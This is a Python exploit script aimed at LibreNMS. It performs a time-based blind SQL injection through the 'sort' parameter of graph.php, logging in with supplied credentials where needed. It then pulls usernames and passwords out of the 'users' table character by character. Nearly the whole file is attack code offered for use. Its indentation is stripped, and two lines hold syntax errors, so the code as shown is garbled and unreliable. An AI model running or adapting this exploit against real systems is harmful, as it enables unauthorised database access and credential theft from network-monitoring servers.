import requests
import urllib3
import os
import sys
import re
from bs4 import BeautifulSoup
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
timeout = 10
inj_prefix = "(select(sleep("
inj_suffix = ")))))"
dec_begin = 48
dec_end = 57
ascii_begin = 32
ascii_end = 126
def keyboard_interrupt():
"""Handles keyboardinterrupt exceptions"""
print("\n\n[*] User requested an interrupt, exiting...")
exit(0)
def http_headers():
headers = {
'User-Agent': 'Mozilla',
}
return headers
def check_auth(url,headers):
print("[*] Checking if authentication for page is required...")
target = url + "/graph.php"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
if "Unauthorized" in r.text:
return True
else:
return False
def get_initial_token_and_cookies(url,headers):
print("[*] Visiting page to retrieve initial token and cookies...")
target = url + "/login"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
soup = BeautifulSoup(r.text,'html.parser')
for n in soup('input'):
if n['name'] == "_token":
token = n['value']
return token,r.cookies
else:
return None,r.cookies
def get_valid_cookie(url,headers,token,cookies,usern,passw):
print("[*] Retrieving authenticated cookie...")
appl_cookie = "laravel_session"
post_data = {'_token':token,
'username':usern,
'password':passw,
'submit':''}
target = url + "/login"
r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False)
res = r.text
if "Overview | LibreNMS" in res:
return r.cookies
else:
print("[!] No valid response from used session, exiting!\n")
exit(-1)
def sqli(url,headers,cookies,inj_str,sleep):
comment_inj_str = re.sub(" ","/**/",inj_str)
inj_params = {'id':'1',
'stat':'none',
'type':'port_mac_acc_total',
'sort':comment_inj_str,
'debug':'1'}
inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())
r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False)
res = r.elapsed.total_seconds()
if res >= sleep:
return True
elif res < sleep:
return False
else:
print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
exit(-1)
def get_rows(url,headers,cookies,table,sleep):
rows = ""
max_pos_rows = 4
for pos in range(1,max_pos_rows+1):
direction = ">"
inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
if not sqli(url,headers,cookies,inj_str,sleep):
break
direction = "="
for num_rows in range(dec_begin,dec_end+1):
row_char = chr(num_rows)
inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
if sqli(url,headers,cookies,inj_str,sleep):
rows += row_char
print(row_char,end='',flush=True)
break
if rows != "":
print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
return int(rows)
else:
return False
def get_data(url,headers,cookies,row,column,table,sleep):
extracted = ""
max_pos_len = 50
print("[*] Extracting strings from row " + str(row+1) + "...")
for pos in range(1,max_pos_len):
direction = ">"
inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
if not sqli(url,headers,cookies,inj_str,sleep):
break
direction = "="
for guess in range(ascii_begin,ascii_end+1):
extracted_char = chr(guess)
inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
if sqli(url,headers,cookies,inj_str,sleep):
extracted += chr(guess)
print(extracted_char,end='',flush=True)
break
return extracted
def main(argv):
if len(sys.argv) == 5:
usern = sys.argv[1]
passw = sys.argv[2]
url = sys.argv[3]
sleep = int(sys.argv[4])
else:
print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
exit(0)
headers = http_headers()
try:
token,cookies = get_initial_token_and_cookies(url,headers)
auth_required = check_auth(url,headers)
if auth_required:
valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw)
else:
valid_cookies = cookies
print("[+] Authentication not required, continue without authentication...")
url = url + "/graph.php"
columns = ['username','password']
table = "users"
print("[*] Printing number of rows in table...")
rows = get_rows(url,headers,valid_cookies,table,sleep)
if not rows:
print("[!] Unable to retrieve rows, checks requests.\n")
exit(-1)
for column in columns:
print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
for row in range(0,rows):
retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep)
print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1))
print("\n[+] Done!\n")
except requests.exceptions.Timeout:
print("[!] Timeout error\n")
exit(-1)
except requests.exceptions.TooManyRedirects:
print("[!] Too many redirects\n")
exit(-1)
except requests.exceptions.ConnectionError:
print("[!] Not able to connect to URL\n")
exit(-1)
except requests.exceptions.RequestException as e:
print("[!] " + str(e))
exit(-1)
except requests.exceptions.HTTPError as e:
print("[!] Failed with error code - " + str(e.code) + "\n")
exit(-1)
except KeyboardInterrupt:
keyboard_interrupt()
exit(-1)
if __name__ == "__main__":
main(sys.argv[1:])